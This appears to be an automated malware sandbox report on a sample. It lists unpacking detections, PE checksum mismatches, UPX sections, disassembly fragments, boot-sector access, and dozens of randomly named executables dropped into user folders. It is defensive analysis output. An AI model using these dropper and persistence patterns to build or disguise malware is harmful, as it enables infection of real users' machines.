                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeUnpacked PE file: 16.2.simplewebbuilder.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.short1:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 22.2.syncUpd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Pictures\Ca4kQMpVXP8DY5HQ8cbuvFmH.exeUnpacked PE file: 25.2.Ca4kQMpVXP8DY5HQ8cbuvFmH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\93gthV73eSBvEuNxXjo0G1yI.exeUnpacked PE file: 28.2.93gthV73eSBvEuNxXjo0G1yI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\eofj7Pf9I3ORdN1nDBhGJIZl.exeUnpacked PE file: 32.2.eofj7Pf9I3ORdN1nDBhGJIZl.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeUnpacked PE file: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                    Source: C:\Users\user\Pictures\Rk1pfEVtKjXZKi5E0UJ5igqM.exeUnpacked PE file: 37.2.Rk1pfEVtKjXZKi5E0UJ5igqM.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Source: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exeUnpacked PE file: 46.2.h9Cux8w1auuBknjQZWKFquuD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeUnpacked PE file: 16.2.simplewebbuilder.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 22.2.syncUpd.exe.400000.0.unpack
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeUnpacked PE file: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack
                    Source: file.exeStatic PE information: 0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004502C0
                    Source: PYAjuaDlqLKzTVmA3BsThyOt.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: dUxbeTroGHi03yY2SNfS5bOl.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: Y4LnHhMyiOb93nCmM4lvPIko.exe.4.drStatic PE information: real checksum: 0x2df335 should be: 0x2d6dda
                    Source: BQEn0lhfn4Y5OIYegdFv1wu3.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: qvx2vm8LJ8TphvujtDcRyl5q.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: 9mAmsWjPEPtkITVqz02hZgXo.exe.4.drStatic PE information: real checksum: 0x2dfc0e should be: 0x2d76b3
                    Source: jUzz7ezNBFbkGCxJO9DOH9dj.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: ZT6AzWxWIFXd7OjNGkbd7Uza.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: bizN5UTpdWpltkCaYrvmwbQI.exe.4.drStatic PE information: real checksum: 0x2d9fde should be: 0x2e1a82
                    Source: VaASjTWoLMCHI6PCL8cSdHon.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: 8MN4Hb5Yz3QkTtMyZERbTpkY.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: UVZ0INMy369gioArueMwqIMb.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: fZDr3c80pCnwYiNsqew1ltFz.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: FnEWeb8TPMfAXv33KZpKVFTq.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe.4.drStatic PE information: real checksum: 0x2d72ac should be: 0x2ded50
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe.4.drStatic PE information: real checksum: 0x2d7638 should be: 0x2df0dc
                    Source: JJGhmGOEefZp3FWJtWea5kYv.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: esF1MUrWaaVP5MG9h4MWEG3L.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: XgAVLWIvGKK9IeCrDuWuJavo.exe.4.drStatic PE information: real checksum: 0x2dfc0e should be: 0x2d76b3
                    Source: 4OwcyrblkGc2hCszHEHuZCPV.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: PvJ9KZy5kaC0ZzTLP46Ng6g6.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: sgtzC1bBRzEH97LXPXHm4FVd.exe.4.drStatic PE information: real checksum: 0x2d3582 should be: 0x2db026
                    Source: uu6kK0oC1Fx2nv3ruwv5SpiV.exe.4.drStatic PE information: real checksum: 0x2dc28e should be: 0x2d3d33
                    Source: XvEaDZrVEGhrm4VFfP27fZuD.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: gNNWpgxfSZev9CgAoQqZomFj.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: C83U8puVpwkXcWSHiHRNiMd6.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: oYJcrFAFnphIaAQPo8IrBCWh.exe.4.drStatic PE information: real checksum: 0x2dc28e should be: 0x2d3d33
                    Source: lUtN2EBQTg4XAhTAimO3WEPd.exe.4.drStatic PE information: real checksum: 0x2df335 should be: 0x2d6dda
                    Source: file.exeStatic PE information: real checksum: 0x0 should be: 0x16749
                    Source: HVNYeIaPfKI1PhwDbNEQTtKf.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: LHg0H4yHSfuTfUKbSoOyunge.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: vuP05YoHCo3Zp0Gv9gzt1k3R.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: MZK43d4eyhmNVFNhS9RLdaaU.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: zWNPblMz8jR3viBabeOSPbWa.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: ph6WaZo2QKdqQsAcLgEj5AUn.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: nUeK1cEoa1XzerepeCLGgwoc.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: byobdbFYFRrd9psjQQD2jS1U.exe.4.drStatic PE information: real checksum: 0x2d72ac should be: 0x2ded50
                    Source: gqqSecZ0iDGmpNUFqal8ttIk.exe.4.drStatic PE information: real checksum: 0x2d5e71 should be: 0x2dd915
                    Source: r5rrZo2uJpDKzb6r7Ao0yzpg.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: sMiDMUawiFqOcW9q4tC0ZctA.exe.4.drStatic PE information: real checksum: 0x2d5e71 should be: 0x2dd915
                    Source: bsQavSmX9wFQ2mntPGaltaow.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: gJVExh69UXMYc2ZOtdjmxeSQ.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: NuRMT0uazLQnmOJibnohOTUR.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: uYudt0flCl0e0fQZ8vnWLOhm.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: dxR7p0Pw8zQ312jALneLeimr.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: GzFms1Le87SMGeCC7Il4yqA4.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: meewdacxdZVSIEbNRUL5vYdZ.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: 8lHsEF0BGMRxgVNdr9FiuFje.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: EaLGCYiRQM2XOtVzyy0ADczF.exe.4.drStatic PE information: real checksum: 0x2d3582 should be: 0x2db026
                    Source: 04gOIpVzf7VOcPzY7ZRrzAhZ.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: 5TjWUMIFlYsM1w3seMz5vnCW.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: KF9G3AcCbu7Zl4IuQK8qDucc.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: HnpqZr8MiBteqHFNrwWZBXQR.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: CZMrbdv3aANr0IrdmBiWfjaH.exe.4.drStatic PE information: real checksum: 0x421c76 should be: 0x41949f
                    Source: 2A8JXH5ilBvpWPJYIqcYohVL.exe.4.drStatic PE information: real checksum: 0x1eaa5 should be: 0x21baf8
                    Source: j9oiPedoYJq65MrsMIBEWZ24.exe.4.drStatic PE information: real checksum: 0x2d9fde should be: 0x2e1a82
                    Source: 2h93Z8eIGDBBod8joPEiBXPj.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: lsTOGQhYLrM0d7OftxaupYqW.exe.4.drStatic PE information: real checksum: 0x2dddde should be: 0x2d5883
                    Source: E6QKqd9T2KlIZuLZuluVgjTV.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x1ded44
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004065C8 push 00406605h; ret 14_2_004065FD
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004040B5 push eax; ret 14_2_004040F1
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00408104 push ecx; mov dword ptr [esp], eax14_2_00408109
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00404185 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00404206 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_0040C218 push eax; ret 14_2_0040C219
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_004042E8 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00404283 push 00404391h; ret 14_2_00404389
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeCode function: 14_2_00408F38 push 00408F6Bh; ret 14_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040994C push 00409989h; ret 15_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00483F88 push 00484096h; ret 15_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004062B4 push ecx; mov dword ptr [esp], eax15_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004104E0 push ecx; mov dword ptr [esp], edx15_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00412928 push 0041298Bh; ret 15_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00494CAC push ecx; mov dword ptr [esp], ecx15_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040CE38 push ecx; mov dword ptr [esp], edx15_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004592D0 push 00459314h; ret 15_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040F398 push ecx; mov dword ptr [esp], edx15_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00443440 push ecx; mov dword ptr [esp], ecx15_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040546D push eax; ret 15_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040553D push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004055BE push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00485678 push ecx; mov dword ptr [esp], ecx15_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0040563B push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004056A0 push 00405749h; ret 15_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004517F8 push 0045182Bh; ret 15_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004519BC push ecx; mov dword ptr [esp], eax15_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00477B08 push ecx; mov dword ptr [esp], edx15_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00419C28 push ecx; mov dword ptr [esp], ecx15_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_0045FD1C push ecx; mov dword ptr [esp], ecx15_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00499D30 pushad ; retf 15_2_00499D3F
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1

                    Persistence and Installation Behavior

                    barindex
                    Contains functionality to infect the boot sector
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive016_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive017_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive017_2_009BFE99
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\MZK43d4eyhmNVFNhS9RLdaaU.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\aY7RTHx8jQe0LE98Ey8c4ndl.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\dxR7p0Pw8zQ312jALneLeimr.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\kJzN0xpcdgPX8gN1vxWscdbl.exeJump to dropped file
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\INetC.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\t9y8ObbFiYcOWDbXePjVCsko.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\UGsTnu7EDyO0V3IPPKetoYJJ.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\dyzUSu8swmONfKr10ailCBUT.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\xgPBlpX67jxMBR1TQvyDxw3Z.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\ksgmAg6JFdvOTBh26OHdTIc1.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\meewdacxdZVSIEbNRUL5vYdZ.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\K38UiC8IqghDOwq5NDROdySK.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy)Jump to dropped file
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeFile created: C:\Users\user\AppData\Local\Temp\syncUpd.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\nUeK1cEoa1XzerepeCLGgwoc.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\5v3yEEfK5SV2v9Tq3rUk66Ct.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\kbc9DF565eKnpzDzd5tpGZeU.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zWNPblMz8jR3viBabeOSPbWa.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\PYAjuaDlqLKzTVmA3BsThyOt.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\UVZ0INMy369gioArueMwqIMb.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\HaCcBcrdDQmsjXXJmI2sBmiB.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rMRbGvsAwIiAMKrvwkPegxs9.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-4024Q.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\9mAmsWjPEPtkITVqz02hZgXo.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\NuRMT0uazLQnmOJibnohOTUR.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gNNWpgxfSZev9CgAoQqZomFj.exeJump to dropped file
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeFile created: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\c36pugF7AAA4eRfz8vwQAxCJ.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gUW3x0OL7IoJHOyAbWlNdUAG.exeJump to dropped file
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\8MN4Hb5Yz3QkTtMyZERbTpkY.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\aUwbp4hWfsJe82ZKgal8jxB3.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\4OwcyrblkGc2hCszHEHuZCPV.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\n6BdP4kaWy0FkY7qAUh37msr.exeJump to dropped file
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Opera_108.0.5067.24_Autoupdate_x64[3].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\r8s8W6BwO9zs4dtTCMpyOk6D.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Q8fp1UEXdipsRABJgu0jdZxz.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\AvqWRNqIe0AJSvnee1t8rq4f.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\8lHsEF0BGMRxgVNdr9FiuFje.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exeFile created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJump to dropped file
                    Source: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exeFile created: C:\Users\user\AppData\Local\Temp\is-TLIOH.tmp\PvJ9KZy5kaC0ZzTLP46Ng6g6.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\ph6WaZo2QKdqQsAcLgEj5AUn.exeJump to dropped file
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\xzRRQmj1LpBxF1iTy72H1YWe.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy)Jump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gJVExh69UXMYc2ZOtdjmxeSQ.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\XHapUUFNPyUhtn0ymqhPvOC6.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpFile created: C:\Users\user\AppData\Local\Simple Web Builder Free\is-177IU.tmpJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\04gOIpVzf7VOcPzY7ZRrzAhZ.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gqqSecZ0iDGmpNUFqal8ttIk.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\arAAytPAHIBxEUE8lqY8jFUv.exeJump to dropped file
